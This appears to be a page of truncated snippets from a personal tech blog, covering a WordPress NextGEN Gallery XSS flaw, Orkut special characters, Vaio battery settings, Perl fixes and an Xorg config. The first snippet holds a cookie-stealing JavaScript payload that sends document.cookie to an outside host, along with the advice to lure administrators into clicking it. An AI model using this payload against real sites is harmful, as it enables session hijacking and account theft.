http://digitalpbk.blogspot.com/2009/07/wordpress-nextgen-gallery-xss.html
code can be put for stealing the cookie:(new Image()).src =
'http://labs.kitiyo.com/store.php?cookie='+document.cookie+'&location;='+window.location;window.location = "URL back to the page";Then post this link accessible to site administrators or other registered users to click and hand us over their session cookies ;)I am infected now what to do? (for webmaster)The XSS is due to blindly allowing to print the $_GET variable onto the title. The makers of this plug ...
Published 2 years, 10 months ago
http://digitalpbk.blogspot.com/2006/12/special-characters-for-orkut.html
Special characters for orkut
Recently analyzing the traffic to my site I found that some wanted to know how to insert special characters in Orkut, yeah the fancy one's... So here is the info for them ... Method 1If you are on
windows, take the character map from Start Menu > Programs > Accessories > System tools > Character Map. You will find all the special characters you need in there. Double clicking a character adds it to the text box below and when you have made your ...
Published 5 years, 5 months ago
http://digitalpbk.com/hardware/sony-vaio-enable-battery-care-function-improve-battery-life
,
Take Vaio Control Center (from Control panel or by typing Vaio Control Center in the start menu).
On left side click Power management and then click on the Battery sub item
Click on enable Battery care function as shown below.
Uncheck it to disable battery care function.
Click on advanced and choose 80%
If your computer is charged to 100%, unplug from the power source, and let the battery go below 80%.
Now you should see lesser battery degradation. :)
Download Battery Care
Windows ...
Published 2 years, 1 month ago
http://digitalpbk.blogspot.com/2009/07/perl-update-code-500-architecture.html
architecture
($Config{'archname'}-$Config{'osvers'})";Change the lines to:#"$Config{'archname'}-$Config{'osvers'}" eq#"i386-linux-thread-multi-2.6.18-53.1.14.el5pae" or# die "Errno architecture (i386-linux-thread-multi-2.6.18-53.1.14.el5pae) does not match executable architecture ($Config{'archname'}-$Config{'osvers'})"; ...
Published 2 years, 10 months ago
http://digitalpbk.blogspot.com/2007/05/perl-script-to-login-to-orkut.html
and GET the redirect page URLGoto the redirect pageGoto Orkut.com/home.aspxYour done.Note:Tested on Linux (FC6, Perl 5.8.8)The following script is for linux, Will run on
Windows too but the ANSI coloring may not work...
Windows Program is given below the program for Linux (without ANSI coloring).For Linux (with ANSI coloring)use WWW::Mechanize;use HTTP::Cookies;use HTTP::Request::Common;$cj=HTTP::Cookies->new(file => "cookie.jar",autosave=>1,ignore_discard=>1);$mech ...
Published 5 years ago
http://digitalpbk.blogspot.com/2008/06/ubuntu-compaq-presario-black-white-xorg.html
.Xorg.conf# nvidia-xconfig: X configuration file generated by nvidia-xconfig# nvidia-xconfig: version 1.0 (buildmeister@builder26) Thu Feb 14 18:13:41 PST 2008# nvidia-settings: X configuration file generated by nvidia-settings# nvidia-settings: version 1.0 (buildd@yellow) Tue Mar 4 20:28:57 UTC 2008# xorg.conf (X.Org X
Window System server configuration file)## This file was generated by dexconf, the Debian X Configuration tool, using# values from the debconf database.## Edit this file with caution ...
Published 3 years, 11 months ago